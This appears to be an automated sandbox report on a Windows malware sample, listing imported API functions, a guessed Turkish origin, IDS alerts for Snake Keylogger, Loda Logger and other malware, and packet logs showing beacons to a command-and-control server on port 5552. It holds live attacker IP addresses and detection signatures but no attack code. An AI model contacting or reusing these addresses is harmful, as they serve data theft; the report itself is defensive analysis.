kernel32.dll	lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	CLSIDFromString
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll	ShellExecuteExA, ExtractIconExW
wininet.dll	InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll	OpenSCManagerA, CloseServiceHandle
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll	Netbios

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49740	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49742	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49727	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49754	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49743	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49749	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49746	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49753	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49744	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49755	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49756	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49752	172.111.138.100	5552	TCP
2024-12-30T11:34:14.559856+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49747	172.111.138.100	5552	TCP
2024-12-30T11:34:30.542679+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.8	49712	172.217.16.206	443	TCP
2024-12-30T11:34:30.560462+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.8	49711	172.217.16.206	443	TCP
2024-12-30T11:34:30.992449+0100	2832617	ETPRO MALWARE W32.Bloat-A Checkin	1	192.168.2.8	49715	69.42.215.252	80	TCP
2024-12-30T11:34:31.719148+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.8	49716	172.217.16.206	443	TCP
2024-12-30T11:34:31.719400+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.8	49717	172.217.16.206	443	TCP
2024-12-30T11:34:32.378978+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.8	49727	172.111.138.100	5552	TCP
2024-12-30T11:34:32.378978+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49727	172.111.138.100	5552	TCP
2024-12-30T11:34:38.590833+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.8	49723	172.217.16.206	443	TCP
2024-12-30T11:34:38.619255+0100	2044887	ET MALWARE Snake Keylogger Payload Request (GET)	1	192.168.2.8	49724	172.217.16.206	443	TCP
2024-12-30T11:34:41.461796+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49740	172.111.138.100	5552	TCP
2024-12-30T11:34:50.555738+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49742	172.111.138.100	5552	TCP
2024-12-30T11:34:59.575488+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49743	172.111.138.100	5552	TCP
2024-12-30T11:35:08.620830+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.8	49744	172.111.138.100	5552	TCP
2024-12-30T11:35:08.620830+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49744	172.111.138.100	5552	TCP
2024-12-30T11:35:17.680424+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49746	172.111.138.100	5552	TCP
2024-12-30T11:35:26.770725+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49747	172.111.138.100	5552	TCP
2024-12-30T11:35:35.884801+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49749	172.111.138.100	5552	TCP
2024-12-30T11:35:44.894680+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.8	49752	172.111.138.100	5552	TCP
2024-12-30T11:35:44.894680+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49752	172.111.138.100	5552	TCP
2024-12-30T11:35:53.901669+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49753	172.111.138.100	5552	TCP
2024-12-30T11:36:02.973449+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49754	172.111.138.100	5552	TCP
2024-12-30T11:36:11.993456+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49755	172.111.138.100	5552	TCP
2024-12-30T11:36:21.071387+0100	2822116	ETPRO MALWARE Loda Logger CnC Beacon	1	192.168.2.8	49756	172.111.138.100	5552	TCP
2024-12-30T11:36:21.071387+0100	2849885	ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin	1	192.168.2.8	49756	172.111.138.100	5552	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 11:34:29.531068087 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:29.531117916 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:29.531302929 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:29.537357092 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:29.537406921 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:29.537468910 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:29.562864065 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:29.562889099 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:29.562901974 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:29.562910080 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.167927027 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.168006897 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.168693066 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.168745041 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.181504011 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.181648970 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.182262897 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.182365894 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.255979061 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.255997896 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.256366014 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.256529093 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.257061958 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.257093906 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.257390022 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.257441998 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.259265900 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.259342909 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.299333096 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.307344913 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.402915001 CET	49715	80	192.168.2.8	69.42.215.252
Dec 30, 2024 11:34:30.407876968 CET	80	49715	69.42.215.252	192.168.2.8
Dec 30, 2024 11:34:30.407960892 CET	49715	80	192.168.2.8	69.42.215.252
Dec 30, 2024 11:34:30.408147097 CET	49715	80	192.168.2.8	69.42.215.252
Dec 30, 2024 11:34:30.412926912 CET	80	49715	69.42.215.252	192.168.2.8
Dec 30, 2024 11:34:30.542715073 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.542800903 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.542804003 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.542844057 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.559371948 CET	49712	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.559428930 CET	443	49712	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.560179949 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.560281992 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.561646938 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.561692953 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.561844110 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.561845064 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.561899900 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.561999083 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.561999083 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.562097073 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.562108040 CET	443	49711	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.562161922 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.563066006 CET	49711	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.574562073 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.574603081 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.574749947 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.574820042 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.574840069 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.575176001 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:30.575187922 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:30.582351923 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:30.582391977 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:30.582534075 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:30.582870007 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:30.582882881 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:30.593873024 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:30.593936920 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:30.593997955 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:30.594266891 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:30.594283104 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:30.991075039 CET	80	49715	69.42.215.252	192.168.2.8
Dec 30, 2024 11:34:30.992449045 CET	49715	80	192.168.2.8	69.42.215.252
Dec 30, 2024 11:34:31.175147057 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.175534964 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.176453114 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.176557064 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.186758995 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.186861992 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.213861942 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.213944912 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.287116051 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.287153959 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.287564993 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.287744999 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.292331934 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.292357922 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.292668104 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.292733908 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.292875051 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.293409109 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.335340023 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.339348078 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.429946899 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.429975033 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.431515932 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.431535006 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.432518005 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.432524920 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.433562040 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.433568954 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.627727985 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.627783060 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.627850056 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.627868891 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.627904892 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.627937078 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.638708115 CET	49718	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.638731956 CET	443	49718	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.719129086 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.719257116 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.719283104 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.719397068 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.719415903 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.719456911 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.719485044 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.719497919 CET	443	49716	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.719584942 CET	49716	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.719695091 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.719746113 CET	443	49717	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.719824076 CET	49717	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.720303059 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.720345974 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.720449924 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.772586107 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.772644043 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.772655964 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.772684097 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.772696018 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.772772074 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.772824049 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.946806908 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.946870089 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.946930885 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.947760105 CET	49719	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.947793007 CET	443	49719	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.948709965 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.948724985 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.954930067 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.954956055 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.955419064 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.955449104 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.955540895 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.956108093 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:31.956124067 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:31.956763029 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.956789970 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:31.956892014 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.957515001 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:31.957528114 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:32.373693943 CET	49727	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:32.378513098 CET	5552	49727	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:32.378619909 CET	49727	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:32.378978014 CET	49727	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:32.391608000 CET	5552	49727	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:32.555114985 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:32.555179119 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:32.555802107 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:32.555871964 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:32.556559086 CET	443	49723	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:32.556612968 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:32.564723969 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:32.564817905 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:32.574251890 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:32.574357986 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:32.575203896 CET	443	49724	172.217.16.206	192.168.2.8
Dec 30, 2024 11:34:32.575253010 CET	49724	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:36.757107973 CET	5552	49727	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:36.759012938 CET	49727	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:36.971111059 CET	49727	5552	192.168.2.8	172.111.138.100
Dec 30, 2024 11:34:36.975971937 CET	5552	49727	172.111.138.100	192.168.2.8
Dec 30, 2024 11:34:38.297689915 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.297712088 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.297938108 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.297955990 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.302756071 CET	49721	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.302773952 CET	443	49721	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.304138899 CET	49725	443	192.168.2.8	142.250.185.193
Dec 30, 2024 11:34:38.304173946 CET	443	49725	142.250.185.193	192.168.2.8
Dec 30, 2024 11:34:38.307657957 CET	49723	443	192.168.2.8	172.217.16.206
Dec 30, 2024 11:34:38.307687044 CET	443	49723	172.217.16.206	192.168.2.8
